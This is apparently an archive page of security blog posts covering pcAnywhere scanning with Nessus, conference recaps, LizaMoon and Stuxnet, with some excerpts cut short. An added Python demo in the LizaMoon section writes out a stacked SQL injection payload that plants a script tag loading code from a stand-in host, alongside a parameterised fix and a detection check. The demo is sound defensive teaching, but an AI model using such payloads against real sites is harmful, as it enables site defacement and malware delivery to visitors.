Current Affairs

Scanning for pcAnywhere

by Ron Gula on January 30, 2012

Note: this blog was updated on Feb 2, 2012 to highlight detection of the Symantec advisory SYM12-002 as well as new Nessus local checks to audit pcAnywhere installations.

With the recent news from Symantec that the theft of its source code has left pcAnywhere open to attack, it makes sense to audit your network for instances of this desktop sharing software. Nessus has many checks that identify the presence of pcAnywhere, the type of network access it supports, and some vulnerabilities in the application. A current list is shown below for reference:

10006 Symantec pcAnywhere Status Service Detection (UDP)
10794 Symantec pcAnywhere Detection (TCP)
10798 Symantec pcAnywhere Service Unrestricted Access
20743 Symantec pcAnywhere Launch with Windows Caller Properties Local Privilege Escalation
32133 Symantec pcAnywhere Access Server Detection Service
35976 Symantec pcAnywhere CHF File Pathname Format String Denial of Service
57795 Symantec pcAnywhere Installed (local check)
57796 Symantec pcAnywhere Multiple Vulnerabilities (SYM12-002)

The detection plugins (10006, 10794, 32133, 57795) only tell you that pcAnywhere is present or listening; 10798 and 57796 are the findings to triage first, since they indicate a service that accepts unrestricted connections or an install affected by SYM12-002.
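As an added example (not code from the original post, and not a Tenable tool), the following Python script pulls the plugin IDs listed above out of a Nessus .nessus v2 export and triages each host by what the fired plugins imply. The XML sample embedded in the script is constructed for the demo: the host addresses, ports and the two non-pcAnywhere entries are invented, and the grouping of IDs into detection / installed / unrestricted / vulnerable is my own reading of the plugin names rather than anything the post states.

```python
import sys
import xml.etree.ElementTree as ET

# Plugin IDs from the list above; the grouping is an assumption based on the names.
DETECTION = {"10006", "10794", "32133"}          # service reachable over the network
INSTALLED = {"57795"}                            # found by a credentialed local check
UNRESTRICTED = {"10798"}                         # anyone can connect
VULNERABLE = {"20743", "35976", "57796"}         # known flaws, incl. SYM12-002
PCANYWHERE_PLUGINS = DETECTION | INSTALLED | UNRESTRICTED | VULNERABLE

# Constructed sample export (hosts, ports and the extra plugin hits are invented).
SAMPLE_NESSUS = """<NessusClientData_v2>
 <Report name="pcAnywhere audit">
  <ReportHost name="10.0.0.5">
   <ReportItem port="5631" svc_name="pcanywheredata" protocol="tcp" severity="0"
     pluginID="10794" pluginName="Symantec pcAnywhere Detection (TCP)" pluginFamily="Service detection"/>
   <ReportItem port="5631" svc_name="pcanywheredata" protocol="tcp" severity="3"
     pluginID="57796" pluginName="Symantec pcAnywhere Multiple Vulnerabilities (SYM12-002)" pluginFamily="Windows"/>
   <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
     pluginID="22964" pluginName="Service Detection" pluginFamily="Service detection"/>
  </ReportHost>
  <ReportHost name="10.0.0.9">
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
     pluginID="57795" pluginName="Symantec pcAnywhere Installed (local check)" pluginFamily="Windows"/>
  </ReportHost>
  <ReportHost name="10.0.0.12">
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="0"
     pluginID="11011" pluginName="Microsoft Windows SMB Service Detection" pluginFamily="Windows"/>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""


def pcanywhere_findings(nessus_xml: str) -> dict:
    """Return {host: {plugin_id: (protocol/port, severity)}} for pcAnywhere plugins only."""
    root = ET.fromstring(nessus_xml)
    findings = {}
    for host in root.iter("ReportHost"):
        hits = {}
        for item in host.findall("ReportItem"):
            pid = item.get("pluginID")
            if pid in PCANYWHERE_PLUGINS:
                hits[pid] = (f"{item.get('protocol')}/{item.get('port')}",
                             int(item.get("severity", "0")))
        if hits:
            findings[host.get("name")] = hits
    return findings


def triage(findings: dict) -> dict:
    """Label each host by what the fired plugins imply, most urgent label first."""
    labels = {}
    for host, hits in findings.items():
        fired = set(hits)
        reasons = []
        if fired & UNRESTRICTED:
            reasons.append("unrestricted-access")
        if fired & VULNERABLE:
            reasons.append("known-vulnerability")
        if fired & DETECTION:
            reasons.append("network-reachable")
        if not reasons:
            reasons.append("installed-only")   # local check only; still worth tracking
        labels[host] = reasons
    return labels


def report(nessus_xml: str) -> list:
    """One line per affected host, sorted so the riskiest hosts come first."""
    findings = pcanywhere_findings(nessus_xml)
    labels = triage(findings)
    order = {"unrestricted-access": 0, "known-vulnerability": 1,
             "network-reachable": 2, "installed-only": 3}
    lines = []
    for host in sorted(labels, key=lambda h: order[labels[h][0]]):
        plugins = ", ".join(f"{pid}@{loc[0]}" for pid, loc in sorted(findings[host].items()))
        lines.append(f"{host}: {'/'.join(labels[host])} [{plugins}]")
    return lines


if __name__ == "__main__":
    # Pass a real export as the first argument, or run without one to use the sample.
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NESSUS
    print("\n".join(report(xml_text)))
```

Run it against a real export (`python pcanywhere_audit.py scan.nessus`) to get one line per host; hosts whose only hit is the local install check still appear, because an install that is not listening today can be enabled tomorrow.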

Black Hat 2011: The Rise Of The Machines

by Paul Asadoorian on August 10, 2011

I attended the Black Hat Briefings this year after teaching the "Advanced Vulnerability Scanning Using Nessus" course. There were several really great presentations covering a wide range of topics. My only wish is that I could have cloned myself and attended more of the talks! Following is a recap of the presentations I attended:

[Photo: Tenable CEO/CTO Ron Gula presenting in the vendor area at Black Hat, showcasing SecurityCenter, the Passive Vulnerability Scanner, Nessus, and the Log Correlation Engine being used together to detect targeted attacks against systems.]

Don Bailey - War Texting: Weaponizing Machine 2 Machine

Several of the presentations this year centered on the topic of embedded systems. This is right up my alley, as I've always had a fascination with embedded computing. Don gave some great examples of embedded systems, including:

Sony: Compliance Lessons Learned

by Paul Asadoorian on May 12, 2011

The Now "Infamous" Sony Hack

It was reported late last month that attackers had penetrated Sony's PSN (PlayStation Network) platform. It has been rumored that reverse engineering of the PlayStation firmware, coupled with vulnerabilities in Linux servers and unencrypted data traversing the network, led to the exposure of over 77 million users' information, possibly including 2.2 million credit card numbers. Sony reportedly may have lost so many credit card numbers that there is speculation it could devalue all stolen cards on the black market.

Preventing & Detecting Malware: A Multifaceted Approach

by Paul Asadoorian on April 5, 2011

Successful Attacks from Automated Malware

Recently, malware dubbed "LizaMoon" (named after the first web site found distributing it) has been popping up in the news:

Dubbed LizaMoon, unidentified perpetrators of the scareware campaign inject script into legitimate URLs, so when people try to access the website, they get redirected to a page warning them that their PCs are infected with malware that can be removed by downloading a free AV application called Windows Stability Center.

From "LizaMoon SQL Injection Attack Hits Websites"

LizaMoon scans web sites for easily exploitable SQL injection vulnerabilities, then uses them to plant redirects on the web site that send users to a site which installs malware. This is not a new form of attack; however, the "LizaMoon" malware has been surprisingly successful. Google searches for infected sites report that over 1.5 million pages have been infected. The important thing to note about the infection numbers is that "pages" does not mean sites, as a single site can have multiple infected pages. This type of attack typically works as follows:
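As an added example (not code from the original post, and not the LizaMoon payload itself), the following Python script shows the general mechanism behind this kind of mass injection and the detection check a site owner can run against stored content. A string-built query lets a second, stacked statement append a script tag to every stored page body, while the parameterised version of the same lookup treats the identical input as an ordinary value and changes nothing. The table, the page content and the attacker host example.invalid are constructed for the demo, and sqlite3's executescript() is used only to stand in for a database driver that executes stacked statements.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Constructed for the demo: the attacker's script host and the tag it plants.
INJECTED_TAG = '<script src="http://example.invalid/ur.php"></script>'
# What an automated injector sends as the "id" parameter: terminate the intended
# SELECT, then append the tag to every page body in the table.
PAYLOAD = f"1; UPDATE articles SET body = body || '{INJECTED_TAG}'"

SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)


def make_db() -> sqlite3.Connection:
    """Two legitimate pages in an in-memory database (constructed sample content)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "INSERT INTO articles VALUES (1, 'Welcome', '<p>Hello</p>');"
        "INSERT INTO articles VALUES (2, 'News', '<p>Nothing new</p>');"
    )
    return db


def lookup_vulnerable(db: sqlite3.Connection, article_id: str) -> None:
    """String-built query. executescript() models a driver that runs stacked
    statements, so the attacker's UPDATE executes along with the SELECT."""
    db.executescript(f"SELECT title, body FROM articles WHERE id = {article_id}")


def lookup_safe(db: sqlite3.Connection, article_id: str) -> list:
    """Parameterised query: the payload is bound as a value and matches no row."""
    return db.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)
    ).fetchall()


def page_bodies(db: sqlite3.Connection) -> list:
    return [row[0] for row in db.execute("SELECT body FROM articles ORDER BY id")]


def foreign_script_hosts(html: str, trusted_hosts: set) -> list:
    """Detection: hosts of <script src=...> includes that are not on the allowlist."""
    flagged = []
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname
        if host and host not in trusted_hosts:
            flagged.append(host)
    return flagged


def demo() -> dict:
    db = make_db()
    safe_result = lookup_safe(db, PAYLOAD)     # no rows, nothing changed
    before = page_bodies(db)
    lookup_vulnerable(db, PAYLOAD)             # every page now carries the tag
    after = page_bodies(db)
    return {
        "safe_result": safe_result,
        "before": before,
        "after": after,
        "flagged": [foreign_script_hosts(b, {"www.example.org"}) for b in after],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The detection half is the cheap check worth scheduling: dump the text columns that end up in rendered pages and flag any script include whose host is not one you serve from. It catches this class of injection regardless of which input was abused, which matters when the vulnerable parameter has not yet been found.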

APT - There.. I Said It.

by Paul Asadoorian on March 24, 2011

Recently I attended the Secure World Boston conference to sit in on a panel with industry experts about APT (Advanced Persistent Threat; for a great write-up on the definition see Richard Bejtlich's article titled "What Is APT and What Does It Want?"). Following are some of my thoughts on the topic:

Is APT something that everyone should be worrying about and planning for (is APT pervasive or just hype)? – APT is a new buzzword, but of course such threats have been around as long as there have been computer networks. It makes me think back to Clifford Stoll's book "The Cuckoo's Egg". I love Cliff's analogy of "jiggling" the keys over the communications lines to disrupt the attackers just enough, while still giving them enough access to keep an eye on them.

Explain how APT works (reconnaissance, phishing, infection, exfiltration)? – The recon phase is the toughest to defend against and the most important phase for an attacker. Pretexting is so important, yet much of the information it relies on has to be public, and it's tough to detect when someone is doing recon. Recon may turn into targeted phishing attacks, which are increasingly successful. No matter how hard we try, we can't educate all our users and expect them to catch 100% of the attacks; we have to rely on technology and training to ward off these attacks. Inevitably, people get into our systems and we need to have measures in place to detect unauthorized access. It's presumptuous to think that your organization will never have a breach.

Mid-Atlantic CCDC - Lessons Learned in Communication

by Paul Asadoorian on March 17, 2011

The CCDC 2011

The Collegiate Cyber Defense Competition (CCDC) is always a fantastic and educational event, and this year was no exception. Hundreds of people converged to share ideas, learn how to hack, learn how to defend and talk about security. Below is a brief summary of the happenings at the event:

The Attackers - Many of the same people as in previous years filled the role of the "hackers". They did a great job this year and showed how much they've learned over the years. The big takeaway from the Red Team is sharing. Using a new tool called "Armitage", they were able to share shell access to the Blue Team hosts, proving that sharing truly is caring.

The Defenders - By design, the Blue Teams are put at a disadvantage. This is meant to emulate the real world, where attackers have vast resources and often stay a step ahead. However, the Blue Teams were very creative, employing reverse sabotage by leaving pieces of paper around the event with usernames and passwords written on them, all of which were completely fake. The Red Team was able to re-configure the Blue Team's phones and leave them messages on the display, a digital "love note" if you will. Phones for the Blue Team were ringing throughout the event, playing random WAV files from a server as well.

Shmoocon 2011 Conference Wrap-Up

by Paul Asadoorian on February 1, 2011

Getting to ShmooCon each year is always challenging (as is trying to get home). Mother Nature seems to enjoy disrupting travel to and from the conference, which is held in Washington, D.C., in January or February of each year. Despite the weather issues, I've always found it to be a conference worth attending. It features quality talks, leading security researchers sharing thoughts and ideas, and several extra events such as "Firetalks" and "Hacker Karaoke".

From Printer to Domain Admin

I've always been fascinated with the concept of attacking printers. The common misconception of "oh, it’s only a printer" makes them a prime target for attackers, because people believe that printers pose little to no security risk. This mindset typically translates to the following conditions, which help to fuel my fascination:

Microsoft Patch Tuesday Roundup - September 2010 - "Silent but deadly" Edition

by Paul Asadoorian on September 15, 2010

"Silent" Worms: Stuxnet The vulnerability patched with MS10-061 is perhaps one of the most interesting we've covered in a "Patch Tuesday" post this year. The vulnerability was discovered when antivirus researchers at Kaspersky Lab analyzed malware called "Stuxnet". The malware was one of the first worms to use the LNK vulnerability , and contained code to exploit three other vulnerabilities, the print spooler vulnerability patched by MS10-061 and two other unnamed privilege escalation vulnerabilities that have yet to be patched. Its not everyday that we hear of malware in the wild exploiting 4 0-day vulnerabilities. I am not easily impressed (in fact, I am even less than impressed) with the capabilities of most malware in the wild. However, there are some facts about the "Stuxnet" malware that do impress me: Stuxnet also contains an exploit for a vulnerability from 2008. It will only execute this exploit if it determines it is inside an organization using SCADA systems and not a typical corporation. Stuxnet was written specifically to attack control systems , and is the first publicly known malware to contain a rootkit for PLCs, devices that control SCADA systems. The rootkit silently waits for commands. Stuxnet gains access to control systems using default passwords and is rumored to have compromised 14 different control systems-based organizations. Stuxnet was first thought to primarily use USB devices to propagate (likely to get around "air gapped" security measures) There was an interesting quote from Symantec that stated, "Symantec gained control of the domain used to send commands to infected machines shortly after Stuxnet was discovered". Apparently, this turned over control of Stuxnet-infected systems to Symantec. I just don't understand the logic behind the malware authors; if they had used fast flux , they may still have control over the botnet they seemed to have worked so hard to implement. 